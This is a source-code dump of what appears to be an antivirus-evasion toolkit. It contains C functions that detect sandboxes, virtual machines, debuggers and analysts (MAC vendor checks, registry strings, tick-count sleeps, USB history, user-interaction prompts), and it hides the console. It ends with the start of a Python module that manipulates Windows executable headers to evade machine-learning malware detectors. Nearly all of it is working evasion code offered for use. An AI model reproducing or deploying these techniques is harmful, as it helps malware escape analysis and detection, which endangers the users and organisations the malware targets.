Expected domain name 13 | void get_computer_domain(char *arg1) { 14 | DEBUG_PRINT("Applying get_computer_domain sandbox evasion technique.\n"); 15 | DEBUG_PRINT("Expected domain is %s...\n", arg1); 16 | 17 | DWORD bufSize = MAX_PATH; 18 | TCHAR domainNameBuf[MAX_PATH]; 19 | 20 | GetComputerNameEx(ComputerNameDnsDomain, domainNameBuf, &bufSize); 21 | 22 | DEBUG_PRINT("Retrieved domain is %s\n", domainNameBuf); 23 | 24 | if(strcmp(domainNameBuf, arg1) != 0) { 25 | DEBUG_PRINT("Not in expected domain, exiting..."); 26 | exit(0); 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /source/implementations/evasion/get_cpu_cores.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include "../debug_print/debug_print.h" 7 | 8 | 9 | // Investigates the number of CPU cores present on the system. If core count is lower than a specified number, the program exits. 10 | // 11 | // arg1: Specifies the core number threshold. Program exits if core count is less than threshold. 12 | void get_cpu_cores(char *arg1) { 13 | SYSTEM_INFO sysinfo; 14 | GetSystemInfo(&sysinfo); 15 | 16 | // arg1 is expected to be a valid base-10 integer representation. 17 | long cpu_core_threshold = strtol(arg1, NULL, 10); 18 | 19 | DEBUG_PRINT("Applying get_cpu_cores evasion technique.\n"); 20 | DEBUG_PRINT("Exiting if number of cpu cores is lower than %ld...\n", cpu_core_threshold); 21 | 22 | if (sysinfo.dwNumberOfProcessors < cpu_core_threshold) { 23 | exit(0); 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /source/implementations/evasion/get_eventlog.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include "../debug_print/debug_print.h" 7 | 8 | 9 | // Investigates the number of eventlogs present on the system. If eventlog count is lower than a specified number, the program exits. 10 | // 11 | // arg1: Specifies the eventlog number threshold. Program exits if eventlog count is less than threshold. 12 | void get_eventlog(char *arg1) { 13 | DEBUG_PRINT("Applying get_eventlog evasion technique.\n"); 14 | 15 | char *call = "powershell.exe "; 16 | char *pwsh = "$lines = Get-WinEvent -ListLog * ^| measure-object -line; echo $lines.Lines"; 17 | char *command = (char *) malloc(strlen(pwsh) + strlen(call) + 1); 18 | long num_eventlog_threshold = strtol(arg1, NULL, 10); 19 | 20 | FILE *fp; 21 | char buf[128]; 22 | char retval[10]; 23 | 24 | strcpy(command, call); 25 | strcat(command, pwsh); 26 | 27 | if ((fp = popen(command, "r")) == NULL) { 28 | DEBUG_PRINT("Error opening pipe!\n"); 29 | exit(0); 30 | } 31 | 32 | while (fgets(buf, 128, fp) != NULL) { 33 | strcat(retval, buf); 34 | } 35 | 36 | long eventlog_count = strtol(retval, NULL, 10); 37 | DEBUG_PRINT("%d\n", eventlog_count); 38 | 39 | if (eventlog_count > num_eventlog_threshold) { 40 | DEBUG_PRINT("Proceed!\n"); 41 | } else { 42 | exit(0); 43 | } 44 | } -------------------------------------------------------------------------------- /source/implementations/evasion/get_install_date.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include "../debug_print/debug_print.h" 7 | 8 | 9 | // Fetch Installation date of Windows 10 | // 11 | // arg1: Date in dd/mm/yyyy, If dates doesn't match the program exits. 12 | void get_install_date(char *arg1) { 13 | char *cmd = "systeminfo | find /i \"original\""; 14 | FILE *fp; 15 | char installdate[200]; 16 | char buf[128]; 17 | 18 | if ((fp = popen(cmd, "r")) == NULL) { 19 | DEBUG_PRINT("Error opening pipe!\n"); 20 | exit(0); 21 | } 22 | 23 | while (fgets(buf, 128, fp) != NULL) { 24 | strcat(installdate, buf); 25 | } 26 | 27 | DEBUG_PRINT("Applying get_install_date evasion technique.\n"); 28 | DEBUG_PRINT("Exiting if dates does not match.\n"); 29 | pclose(fp); 30 | 31 | if (strstr(installdate, arg1) != NULL) { 32 | DEBUG_PRINT("Proceed!\n"); 33 | 34 | } else { 35 | DEBUG_PRINT("Dates does not match: %s != %s", installdate, arg1); 36 | exit(0); 37 | } 38 | } 39 | -------------------------------------------------------------------------------- /source/implementations/evasion/get_num_processes.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "../debug_print/debug_print.h" 5 | 6 | 7 | // Count the number of running Processes 8 | // 9 | // arg1: Specifies process threshold. Program exits if process count is less than threshold. 10 | void get_num_processes(char *arg1) { 11 | int minNumProcesses = atoi(arg1); 12 | 13 | DWORD loadedProcesses[1024]; 14 | DWORD cbNeeded; 15 | DWORD runningProcesses; 16 | 17 | if (!EnumProcesses(loadedProcesses, sizeof(loadedProcesses), &cbNeeded)) { 18 | DEBUG_PRINT("Could not get processes.\n"); 19 | } 20 | 21 | runningProcesses = cbNeeded / sizeof(DWORD); 22 | 23 | DEBUG_PRINT("Applying get_num_processes evasion technique.\n"); 24 | DEBUG_PRINT("Exiting if number of processes are below threshold.\n"); 25 | 26 | if (runningProcesses >= minNumProcesses) { 27 | DEBUG_PRINT("Proceed!.\n"); 28 | } else { 29 | exit(0); 30 | } 31 | } 32 | -------------------------------------------------------------------------------- /source/implementations/evasion/get_registry_size.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include "../debug_print/debug_print.h" 6 | 7 | // 8 | // WIP 9 | // 10 | void get_registry_size(char *arg1) { 11 | DWORD BufferSize = 8192; 12 | DWORD cbData; 13 | DWORD dwRet; 14 | 15 | long threshold = strtol(arg1, NULL, 10); 16 | 17 | PPERF_DATA_BLOCK PerfData = (PPERF_DATA_BLOCK) malloc( BufferSize ); 18 | cbData = BufferSize; 19 | 20 | DEBUG_PRINT("Applying get_registry_size evasion technique.\n"); 21 | DEBUG_PRINT("Exiting if size is less than given threshold\n"); 22 | 23 | dwRet = RegQueryValueEx( HKEY_PERFORMANCE_DATA, 24 | TEXT("Global"), 25 | NULL, 26 | NULL, 27 | (LPBYTE) PerfData, 28 | &cbData ); 29 | 30 | if (dwRet == ERROR_SUCCESS && BufferSize >= threshold) { 31 | DEBUG_PRINT("Proceed!\n"); 32 | } else { 33 | exit(0); 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /source/implementations/evasion/get_standard_browser.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include "../debug_print/debug_print.h" 7 | 8 | 9 | // Programm exits if Browser does not Match with given Argument 10 | // 11 | // arg1: Programm ID of the Browser: MSEdgeHTM, Firefox or ChromeHTML 12 | void get_standard_browser(char *arg1) { 13 | char value[255]; 14 | DWORD BufferSize = 8192; 15 | 16 | // Read Registry Key to get the default Browser 17 | RegGetValue(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\Shell\\Associations\\URLAssociations\\http\\UserChoice", "Progid", RRF_RT_ANY, NULL, (PVOID)&value, &BufferSize); 18 | DEBUG_PRINT("Applying get_standard_browser evasion technique.\n"); 19 | DEBUG_PRINT("Exiting if provided Browser does not match.\n"); 20 | 21 | if(strstr(value, arg1) != NULL){ 22 | DEBUG_PRINT("Proceed!\n"); 23 | } else { 24 | DEBUG_PRINT("Browsers does not match %s != %s\n", value, arg1); 25 | exit(0); 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /source/implementations/evasion/get_tickcount.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include "../debug_print/debug_print.h" 7 | #include 8 | 9 | // Check if sandbox utilize fast forwarding to reduce heuristic check time 10 | // 11 | // use GetTickCount before and after sleep and calculate the difference 12 | // If the difference and specified sleep time match, we proceed 13 | // arg1: nothing 14 | void get_tickcount(char *arg1) { 15 | DEBUG_PRINT("Applying get_tickcount technique.\n"); 16 | 17 | ULONGLONG uptimeBeforeSleep = GetTickCount(); 18 | 19 | LARGE_INTEGER delay; 20 | delay.QuadPart = -10000 * 100000; // 100 seconds 21 | typedef NTSTATUS(WINAPI *PNtDelayExecution)(IN BOOLEAN, IN PLARGE_INTEGER); 22 | PNtDelayExecution pNtDelayExecution = (PNtDelayExecution)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtDelayExecution"); 23 | 24 | pNtDelayExecution(FALSE, &delay); 25 | 26 | ULONGLONG uptimeAfterSleep = GetTickCount(); 27 | 28 | if ((uptimeAfterSleep - uptimeBeforeSleep) < 100000) { 29 | exit(0); 30 | } else { 31 | DEBUG_PRINT("Proceed!\n"); 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /source/implementations/evasion/get_usb.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include "../debug_print/debug_print.h" 6 | 7 | 8 | // 9 | // WIP 10 | // 11 | void get_usb(char *arg1) { 12 | HKEY hKey; 13 | DWORD numUsbDevices = 0; 14 | int MinimumUsbHistory = atoi(arg1); 15 | 16 | DEBUG_PRINT("Applying get_usb evasion technique.\n"); 17 | 18 | // Open Key with USB Information 19 | if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SYSTEM\\ControlSet001\\Enum\\USBSTOR", 0, KEY_READ, &hKey) == ERROR_SUCCESS) { 20 | // number of Subkeys = number of mounted USB devices 21 | // Get number of subkeys 22 | if (RegQueryInfoKeyA(hKey, NULL, NULL, NULL, &numUsbDevices, NULL, NULL, NULL, NULL, NULL, NULL, NULL) == ERROR_SUCCESS) { 23 | 24 | } else { 25 | DEBUG_PRINT("Unable to query subkey HKLM::SYSTEM\\ControlSet001\\Enum\\USBSTOR\n"); 26 | } 27 | } else { 28 | DEBUG_PRINT("Unable to open subkey HKLM::SYSTEM\\ControlSet001\\Enum\\USBSTOR\n"); 29 | } 30 | 31 | DEBUG_PRINT("Exiting if number of mounted usb devices is lower than %ld...\n", MinimumUsbHistory); 32 | 33 | if (numUsbDevices >= MinimumUsbHistory) { 34 | DEBUG_PRINT("Number of USB devices ever mounted: %d\n", numUsbDevices); 35 | DEBUG_PRINT("Proceed!\n"); 36 | } else { 37 | exit(0); 38 | } 39 | } -------------------------------------------------------------------------------- /source/implementations/evasion/gethostbyname_sandbox_evasion.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include "../debug_print/debug_print.h" 7 | 8 | 9 | // gethostbyname evasion technique. 10 | // Attempts to gather information associated with a specified host. 11 | // The gethostbyname function is expected to fail (by returning NULL). If it succeeds instead, the program exits. 12 | // 13 | // arg1: Specifies the host name to lookup. 14 | // --- 15 | // Link with -lws2_32 switch when compiling 16 | void gethostbyname_sandbox_evasion(char *arg1) { 17 | DEBUG_PRINT("Applying gethostbyname sandbox evasion technique.\n"); 18 | DEBUG_PRINT("Attempting to retrieve info for hostname %s...\n", arg1); 19 | 20 | struct hostent *hp = gethostbyname(arg1); 21 | 22 | if(hp != NULL) { 23 | exit(0); 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /source/implementations/evasion/has_background_wp.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include "../debug_print/debug_print.h" 8 | 9 | 10 | // Proceed if a background wallpaper is set, else exits 11 | void has_background_wp(char *arg1) { 12 | char * appdata = getenv("APPDATA"); 13 | 14 | if (!appdata) { 15 | DEBUG_PRINT("Unable to get APPDATA.\n"); 16 | } 17 | char buffer[1024]; 18 | sprintf(buffer, "%s\\Microsoft\\Windows\\Themes\\TranscodedWallpaper", appdata); 19 | 20 | DEBUG_PRINT("Applying has_background_wp evasion technique.\n"); 21 | DEBUG_PRINT("Exiting if background wallpaper is not set\n"); 22 | if( access(buffer, F_OK ) != -1 ) { 23 | DEBUG_PRINT("Proceed!\n"); 24 | } else { 25 | exit(0); 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /source/implementations/evasion/has_folder.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include "../debug_print/debug_print.h" 7 | 8 | // This fuction checks if a folder exists. 9 | // 10 | // arg1: path to folder 11 | // must be in unix style, because "\" makes problems 12 | void has_folder(char *arg1) { 13 | DEBUG_PRINT("Applying has_folder evasion technique.\n"); 14 | DEBUG_PRINT("Exiting if %s does not exists.\n", arg1); 15 | 16 | struct stat stats; 17 | 18 | stat(arg1, &stats); 19 | 20 | if (S_ISDIR(stats.st_mode)) { 21 | DEBUG_PRINT("Proceed!\n"); 22 | } else { 23 | exit(0); 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /source/implementations/evasion/has_network_drive.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include "../debug_print/debug_print.h" 7 | 8 | 9 | // Check if Network Drive exists, proceed if this is the case 10 | void has_network_drive(char *arg1) { 11 | char * network = getenv("CSIDL_NETWORK"); 12 | 13 | if (!network) { 14 | DEBUG_PRINT("Unable to get CSIDL_NETWORK\n"); 15 | } 16 | 17 | DEBUG_PRINT("Applying has_network_drive evasion technique.\n"); 18 | DEBUG_PRINT("Exiting if recent files directory does not exist.\n"); 19 | struct stat stats; 20 | 21 | stat(network, &stats); 22 | 23 | if (S_ISDIR(stats.st_mode)) { 24 | DEBUG_PRINT("Proceed!\n"); 25 | } else { 26 | exit(0); 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /source/implementations/evasion/has_process_exit.h: -------------------------------------------------------------------------------- 1 | // look for process, exit if process exist 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include "../debug_print/debug_print.h" 11 | 12 | using namespace std; 13 | 14 | BOOL GetProcessList(char *arg1); 15 | BOOL TerminateBlacklistedProcess(DWORD dwProcessId, UINT uExitCode); 16 | 17 | void has_process_exit( char *arg1 ) 18 | { 19 | DEBUG_PRINT("Applying has_processes_exit technique.\n"); 20 | DEBUG_PRINT("Looking for process %s and exit if found.\n", arg1); 21 | GetProcessList( arg1 ); 22 | } 23 | 24 | BOOL GetProcessList(char *arg1 ) 25 | { 26 | DEBUG_PRINT("GetProcessList\n"); 27 | HANDLE hProcessSnap; 28 | HANDLE hProcess; 29 | PROCESSENTRY32 pe32; 30 | DWORD dwPriorityClass; 31 | 32 | //Blacklisted processes 33 | LPSTR ProcessName = arg1; 34 | 35 | // Take a snapshot of processes 36 | hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 ); 37 | if( hProcessSnap == INVALID_HANDLE_VALUE ) 38 | { 39 | printf("exit\n"); 40 | return( FALSE ); 41 | } 42 | 43 | pe32.dwSize = sizeof( PROCESSENTRY32 ); 44 | 45 | if( !Process32First( hProcessSnap, &pe32 ) ) 46 | { 47 | CloseHandle( hProcessSnap ); 48 | return( FALSE ); 49 | } 50 | 51 | do 52 | { 53 | string str(pe32.szExeFile); 54 | 55 | 56 | if(str == ProcessName) 57 | { 58 | cout << "[*] process found, exit: " << (ProcessName) << endl; 59 | return (TRUE); 60 | } 61 | 62 | } while( Process32Next( hProcessSnap, &pe32 ) ); 63 | 64 | CloseHandle( hProcessSnap ); 65 | return( TRUE ); 66 | } 67 | -------------------------------------------------------------------------------- /source/implementations/evasion/has_public_desktop.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include "../debug_print/debug_print.h" 7 | 8 | 9 | // Check if Public Desktop exists, proceed if this is the case 10 | void has_public_desktop(char *arg1) { 11 | DEBUG_PRINT("Applying has_public_desktop evasion technique.\n"); 12 | DEBUG_PRINT("Exiting if public desktop does not exists.\n"); 13 | 14 | struct stat stats; 15 | 16 | stat("c:\\Users\\Public\\Desktop", &stats); 17 | 18 | if (S_ISDIR(stats.st_mode)) { 19 | DEBUG_PRINT("Proceed!\n"); 20 | } else { 21 | exit(0); 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /source/implementations/evasion/has_recent_files.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include "../debug_print/debug_print.h" 7 | 8 | 9 | // Check if Recent Files Folder exists, proceed if this is the case 10 | void has_recent_files() { 11 | char * recentFiles = getenv("CSIDL_RECENT"); 12 | 13 | if (!recentFiles) { 14 | DEBUG_PRINT("Unable to get CSIDL_RECENT\n"); 15 | } 16 | 17 | DEBUG_PRINT("Applying has_recent_files evasion technique.\n"); 18 | DEBUG_PRINT("Exiting if recent files directory does not exist.\n"); 19 | struct stat stats; 20 | 21 | stat(recentFiles, &stats); 22 | 23 | if (S_ISDIR(stats.st_mode)) { 24 | DEBUG_PRINT("Proceed!\n"); 25 | } else { 26 | exit(0); 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /source/implementations/evasion/has_recycle_bin.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include "../debug_print/debug_print.h" 7 | 8 | 9 | // Check if Recycle Bin exists, proceed if this is the case 10 | void has_recycle_bin(char *arg1) { 11 | DEBUG_PRINT("Applying has_recycle_bin evasion technique.\n"); 12 | DEBUG_PRINT("Exiting if recycle bin does not exists.\n"); 13 | 14 | struct stat stats; 15 | 16 | stat("c:\\$Recycle.Bin", &stats); 17 | 18 | if (S_ISDIR(stats.st_mode)) { 19 | DEBUG_PRINT("Proceed!\n"); 20 | } else { 21 | exit(0); 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /source/implementations/evasion/has_username.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include "../debug_print/debug_print.h" 8 | 9 | 10 | // Lookup the username of the current user 11 | // 12 | // arg1: username, if given username does not match with the fetched username 13 | // the Program exits 14 | void has_username(char *arg1) { 15 | 16 | char* username = getenv("USERNAME");; 17 | 18 | 19 | DEBUG_PRINT("Applying has_username evasion technique.\n"); 20 | DEBUG_PRINT("Exiting if given username does not match.\n"); 21 | 22 | if (!strcmp(username, arg1)) { 23 | DEBUG_PRINT("Proceed!\n"); 24 | } else { 25 | DEBUG_PRINT("Username does not match %s != %s.\n", arg1, username); 26 | exit(0); 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /source/implementations/evasion/has_vm_mac.h: -------------------------------------------------------------------------------- 1 | /* Large parts of the code copied/inspired from https://github.com/a0rtega/pafish 2 | should work for vmware and VirtualBox */ 3 | #pragma once 4 | 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include "../debug_print/debug_print.h" 11 | 12 | 13 | /* left the original pafish function */ 14 | int pafish_check_mac_vendor(char * mac_vendor) { 15 | unsigned long alist_size = 0, ret; 16 | 17 | ret = GetAdaptersAddresses(AF_UNSPEC,0,0,0,&alist_size); 18 | if(ret==ERROR_BUFFER_OVERFLOW) { 19 | IP_ADAPTER_ADDRESSES* palist = (IP_ADAPTER_ADDRESSES*)LocalAlloc(LMEM_ZEROINIT,alist_size); 20 | void * palist_free = palist; 21 | if(palist) { 22 | GetAdaptersAddresses(AF_UNSPEC,0,0,palist,&alist_size); 23 | char mac[6]={0}; 24 | while (palist){ 25 | if (palist->PhysicalAddressLength==0x6){ 26 | memcpy(mac,palist->PhysicalAddress,0x6); 27 | if (!memcmp(mac_vendor, mac, 3)) { /* First 3 bytes are the same */ 28 | LocalFree(palist_free); 29 | return TRUE; 30 | } 31 | } 32 | palist = palist->Next; 33 | } 34 | LocalFree(palist_free); 35 | } 36 | } 37 | return FALSE; 38 | } 39 | 40 | 41 | void has_vm_mac() 42 | { 43 | /* 44 | VMware is any of 45 | 00:05:69 46 | 00:0C:29 47 | 00:1C:14 48 | 00:50:56 49 | */ 50 | if (pafish_check_mac_vendor("\x00\x05\x69")) { 51 | DEBUG_PRINT("MAC VMWare found.\n"); 52 | exit(0); 53 | } 54 | else if (pafish_check_mac_vendor("\x00\x0C\x29")) { 55 | DEBUG_PRINT("MAC VMWare found.\n"); 56 | exit(0); 57 | } 58 | else if (pafish_check_mac_vendor("\x00\x1C\x14")) { 59 | DEBUG_PRINT("MAC VMWare found.\n"); 60 | exit(0); 61 | } 62 | else if (pafish_check_mac_vendor("\x00\x50\x56")) { 63 | DEBUG_PRINT("MAC VMWare found.\n"); 64 | exit(0); 65 | } 66 | /* VirtualBox mac starts with 08:00:27 */ 67 | else if (pafish_check_mac_vendor("\x08\x00\x27")) { 68 | DEBUG_PRINT("MAC VirtualBox found.\n"); 69 | exit(0); 70 | } 71 | 72 | } 73 | -------------------------------------------------------------------------------- /source/implementations/evasion/has_vm_regkey.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include "../debug_print/debug_print.h" 6 | 7 | 8 | // Checks for a specified set of strings related to VM environments in the registry. 9 | // If one of the strings is found, the program exits. 10 | // 11 | // arg1: Specifies the set of strings to search for. Entries are comma-separated. 12 | // Hence, individual search strings must not contain comma characters. 13 | // Total search string length is currently limited to 1023. 14 | void has_vm_regkey(char *arg1) { 15 | DEBUG_PRINT("Applying has_vm_regkey evasion technique.\n"); 16 | DEBUG_PRINT("Checking registry key SYSTEM\\ControlSet001\\Services\\Disk\\Enum for search set %s...\n", arg1); 17 | 18 | HKEY hKey; 19 | int i; 20 | char szBuffer[1024]; 21 | char complete_search_str[1024]; 22 | char *current_search_str; 23 | char *delim; 24 | 25 | DWORD dwSize = sizeof(szBuffer) - 1; 26 | 27 | // Retrieve registry key content 28 | if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SYSTEM\\ControlSet001\\Services\\Disk\\Enum", 0, KEY_READ, &hKey) == ERROR_SUCCESS) { 29 | RegQueryValueEx(hKey, "0", NULL, NULL, (unsigned char *)szBuffer, &dwSize); 30 | 31 | // Compare content against search strings 32 | // Work on our own copy 33 | strcpy(complete_search_str, arg1); 34 | // Set current marker at beginning 35 | current_search_str = complete_search_str; 36 | 37 | // Iterate until no comma delimiter found 38 | while((delim = strchr(current_search_str, ',')) != NULL) { 39 | // Terminate current string at delimiter 40 | *delim = '\0'; 41 | 42 | // Search for current string in registry content. If found, exit. 43 | if(strstr(szBuffer, current_search_str)) { 44 | DEBUG_PRINT("Found %s, exiting...\n", current_search_str); 45 | RegCloseKey(hKey); 46 | exit(0); 47 | } 48 | 49 | // Update current search string to next entry 50 | current_search_str = delim + 1; 51 | } 52 | 53 | // Process last entry 54 | if(strstr(szBuffer, current_search_str)) { 55 | DEBUG_PRINT("Found %s, exiting...\n", current_search_str); 56 | RegCloseKey(hKey); 57 | exit(0); 58 | } 59 | 60 | RegCloseKey(hKey); 61 | } else { 62 | DEBUG_PRINT("Could not open registry key.\n"); 63 | } 64 | 65 | DEBUG_PRINT("Found none. Proceeding.\n"); 66 | } 67 | -------------------------------------------------------------------------------- /source/implementations/evasion/hide_console.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "../debug_print/debug_print.h" 5 | 6 | 7 | // Hides the console window 8 | // arg1 is not used here and therefore ignored 9 | void hide_console(char *arg1) { 10 | DEBUG_PRINT("Hiding console window...\n"); 11 | ShowWindow(GetConsoleWindow(), SW_HIDE); 12 | } 13 | -------------------------------------------------------------------------------- /source/implementations/evasion/interaction_getchar.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "../debug_print/debug_print.h" 5 | 6 | 7 | // Wait until input is delivered using getchar. 8 | // 9 | // arg1: not used 10 | void interaction_getchar(char *arg1) { 11 | DEBUG_PRINT("Waiting for input...\n"); 12 | char input = getchar(); 13 | // Output gathered input to avoid dead code 14 | putchar(input); 15 | DEBUG_PRINT("Input delivered, proceeding..."); 16 | } 17 | -------------------------------------------------------------------------------- /source/implementations/evasion/interaction_msg_box.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include "../debug_print/debug_print.h" 7 | 8 | 9 | // Spawn message box with hardcoded arithmetic task which only executes of it is solved correctly. 10 | // 11 | // No arg 12 | void interaction_msg_box(char *arg1) { 13 | DEBUG_PRINT("Applying interactive_msg_box evasion technique.\n"); 14 | 15 | char *call = "powershell.exe "; 16 | char *pwsh = "Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing;$window = New-Object System.Windows.Forms.Form;$window.Width = 500;$window.Height = 150;$Label = New-Object System.Windows.Forms.Label;$Label.Location = New-Object System.Drawing.Size(10,10);$Label.Text = 'Rechne aus: 5+5';$Label.AutoSize = $True;$window.Controls.Add($Label);$windowButton = New-Object System.Windows.Forms.Button;$windowButton.Location = New-Object System.Drawing.Size(10,60);$windowButton.Size = New-Object System.Drawing.Size(50,30);$windowButton.Text = 'OK';$windowButton.Enabled = $false;$windowTextBox = New-Object System.Windows.Forms.TextBox;$windowTextBox.Location = New-Object System.Drawing.Size(10,30);$windowTextBox.Size = New-Object System.Drawing.Size(350,350);$windowTextBox.add_TextChanged({$windowButton.Enabled = $windowTextBox.Text});$window.Controls.Add($windowTextBox);$windowButton.Add_Click({$calc = [int]$windowTextBox.Text;if($calc -eq 10) {Write-Host '0';}else {Write-Host '-1';}$window.Dispose();});$window.Controls.Add($windowButton);[void]$window.ShowDialog();"; 17 | char *command = (char *) malloc(strlen(pwsh) + strlen(call) + 1); 18 | FILE *fp; 19 | char buf[128]; 20 | char retval[10]; 21 | 22 | strcpy(command, call); 23 | strcat(command, pwsh); 24 | 25 | 26 | if ((fp = popen(command, "r")) == NULL) { 27 | DEBUG_PRINT("Error opening pipe!\n"); 28 | exit(0); 29 | } 30 | 31 | while (fgets(buf, 128, fp) != NULL) { 32 | strcat(retval, buf); 33 | } 34 | if (strstr(retval, "0")) { 35 | DEBUG_PRINT("Proceed!\n"); 36 | } else { 37 | exit(0); 38 | } 39 | } -------------------------------------------------------------------------------- /source/implementations/evasion/interaction_system_pause.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include "../debug_print/debug_print.h" 6 | 7 | 8 | // Execute system("pause"), causing the spawned cmd (and our main process) to wait for any keypress. 9 | // 10 | // arg1: not used 11 | void interaction_system_pause(char *arg1) { 12 | DEBUG_PRINT("Calling system(pause)...\n"); 13 | system("pause"); 14 | DEBUG_PRINT("Proceeding..."); 15 | } 16 | -------------------------------------------------------------------------------- /source/implementations/evasion/is_debugger_present.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "../debug_print/debug_print.h" 9 | 10 | 11 | // Exits if debugger is present 12 | void is_debugger_present(char *arg1) { 13 | 14 | if(!IsDebuggerPresent()) { 15 | DEBUG_PRINT("Proceed!\n"); 16 | } else { 17 | exit(0); 18 | } 19 | } -------------------------------------------------------------------------------- /source/implementations/evasion/sleep_by_ping.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include "../debug_print/debug_print.h" 7 | 8 | 9 | // Halt execution of the program for arg1 seconds by invoking a timed ping command against localhost. 10 | // Will ping once each second, for arg1 times. 11 | // 12 | // arg1: ping duration in seconds 13 | void sleep_by_ping(char *arg1) { 14 | DEBUG_PRINT("Applying sleep_by_ping technique.\n"); 15 | DEBUG_PRINT("Pinging localhost for %s seconds.\n", arg1); 16 | 17 | char *ping_command = "ping 127.0.0.1 -n "; 18 | char *complete_command = (char *) malloc(strlen(ping_command) + strlen(arg1) + 1); 19 | strcpy(complete_command, ping_command); 20 | strcat(complete_command, arg1); 21 | DEBUG_PRINT("Invoking command %s \n", complete_command); 22 | system(complete_command); 23 | free(complete_command); 24 | DEBUG_PRINT("Ping finished, proceeding..."); 25 | } 26 | -------------------------------------------------------------------------------- /source/implementations/gen_adversarial_exe/malconv/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/govolution/avet/6da43bff14a81327143fd67433b821a9c85d99f8/source/implementations/gen_adversarial_exe/malconv/__init__.py -------------------------------------------------------------------------------- /source/implementations/gen_adversarial_exe/malconv/pretrained_malconv.pth: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/govolution/avet/6da43bff14a81327143fd67433b821a9c85d99f8/source/implementations/gen_adversarial_exe/malconv/pretrained_malconv.pth -------------------------------------------------------------------------------- /source/implementations/gen_adversarial_exe/practical_manipulations/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/govolution/avet/6da43bff14a81327143fd67433b821a9c85d99f8/source/implementations/gen_adversarial_exe/practical_manipulations/__init__.py -------------------------------------------------------------------------------- /source/implementations/gen_adversarial_exe/practical_manipulations/full_dos.py: -------------------------------------------------------------------------------- 1 | """ 2 | Implementation of Full DOS practical manipulation from 3 | Adversarial EXEmples: A Survey and Experimental Evaluation of 4 | Practical Attacks on Machine Learning for Windows Malware Detection 5 | by Demetrio et al. 6 | 7 | Can be used standalone with random bytes or via genetic optimizer. 8 | """ 9 | 10 | import os 11 | import sys 12 | import copy 13 | 14 | import lief 15 | 16 | 17 | def full_dos_on_bytes(exe_bytes: bytearray, section_population, vector_t): 18 | """ 19 | Implementation of Full DOS practical manipulation. 20 | Intended for use with genetic optimizer. 21 | 22 | Returns the bytes with the practical manipulation applied. 23 | """ 24 | 25 | content = bytearray() 26 | for i, section in enumerate(section_population): 27 | content += section[:int(round(len(section) * vector_t[i]))] 28 | 29 | exe_object: lief.PE.Binary = lief.parse(exe_bytes) 30 | 31 | # get range allowed to perturb 32 | pe_header_offset = exe_object.dos_header.addressof_new_exeheader 33 | range_to_perturb = list(range(2, 0x3c)) + \ 34 | list(range(0x40, pe_header_offset)) 35 | 36 | raw_bytes = copy.deepcopy(exe_bytes) 37 | 38 | # perturb DOS header 39 | counter = 0 40 | for i in range_to_perturb: 41 | raw_bytes[i] = content[counter % len(content)] 42 | counter += 1 43 | 44 | return raw_bytes 45 | 46 | 47 | def full_dos(exe_path): 48 | """ 49 | Implementation 